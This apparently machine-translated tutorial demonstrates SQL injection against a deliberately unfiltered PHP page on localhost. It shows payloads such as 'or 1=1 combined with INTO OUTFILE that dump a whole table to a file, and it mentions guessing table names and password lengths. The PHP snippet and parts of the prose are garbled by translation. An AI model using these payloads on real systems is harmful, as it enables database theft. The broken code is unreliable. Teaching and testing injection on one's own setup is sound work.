SQL security-Principles of Database theft due to SQL injection vulnerabilities

This article uses some of your own experience to tell your hacker friends how to use your Database SQL vulnerability to download your database. For more information, see this article. create a table in the database. the code is as follows: CREATETABLEnbsp... this article uses some of your own experience to tell your hacker friends how to use your Database SQL vulnerability to download your database. For more information, see this article.

Create a table in the database. the code is as follows:

CREATE TABLE `article` ( `articleid` int(11) NOT NULL AUTO_INCREMENT, `title` varchar(100) CHARACTER SET utf8 NOT NULL DEFAULT '', `content` text CHARACTER SET utf8 NOT NULL, PRIMARY KEY (`articleid`) ) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=latin1;

After inserting data in a table, I will not post code. you can download the data and import it directly to the database. Next, write a page for processing user requests. here, we intentionally did not filter the data submitted by the user, leaving an SQL injection vulnerability for testing. the code is as follows:

 Database theft using SQL injection
"; // Open source code phprm.com if (! $ Row) {echo "this record does not exist"; exit;} echo "title
". $ Row ['title']."
"; Echo" content
". $ Row ['content']."
";

Enter the following in the browser:

Http: // 127.0.0.1/marcofly/phpstudy/sqlinsert/show.php? Id = 1

You can access a record with id 1 in the article table.

Next, we will take advantage of this vulnerability (only tools and manual detection can be used without knowing it) to demonstrate how to download the article table and enter it in the address bar:

'Into outfile' e:/SQL .txt '% 23

Analysis: % 23 is the # ASCII code. because you enter # directly in the address bar and it will become null in the database system, you need to enter % 23 in the address bar before it will become #, comment out the following SQL statement.

After the license is run, open the e-disk and find an additional SQL .txt file. after the file is opened, it contains a record in the table article. why is there only one record? Does the data table have only one record? This is not the case because we only retrieve one record with id 1. can we download all the records in the article table at a time?

The answer is yes, as long as your SQL statements are flexible enough (the flexibility to construct SQL statements is proposed again ).

For analysis, when you enter 'into outfile' e:/SQL .txt '% 23 in the URL address bar, the statement is merged into the SQL query statement:

SELECT * FROM article WHERE articleid = '5' into outfile 'E:/whf.txt '#'

After careful analysis, we can construct an SQL statement like this:

SELECT * FROM article WHERE articleid = ''or 1 = 1 into outfile 'E:/whf.txt '#'

In this case, the WHERE clause is always true. In other words, the SQL statement is equivalent to the following:

SELECT * FROM article into outfile 'E:/whf.txt '#'

Now, the SQL statement first executes the select statement, retrieves all the content in the table article, and then executes the into outfile 'E:/whf.txt '#' command to export the content.

If you don't believe it, execute ...... With the SQL injection vulnerability, we can guess the table name, column name, user password length (LEFT function), and so on. of course, if you can export all the data in the table as shown above, you do not need to guess the table name.

Permanent link:

Reprint at will! Include the article address.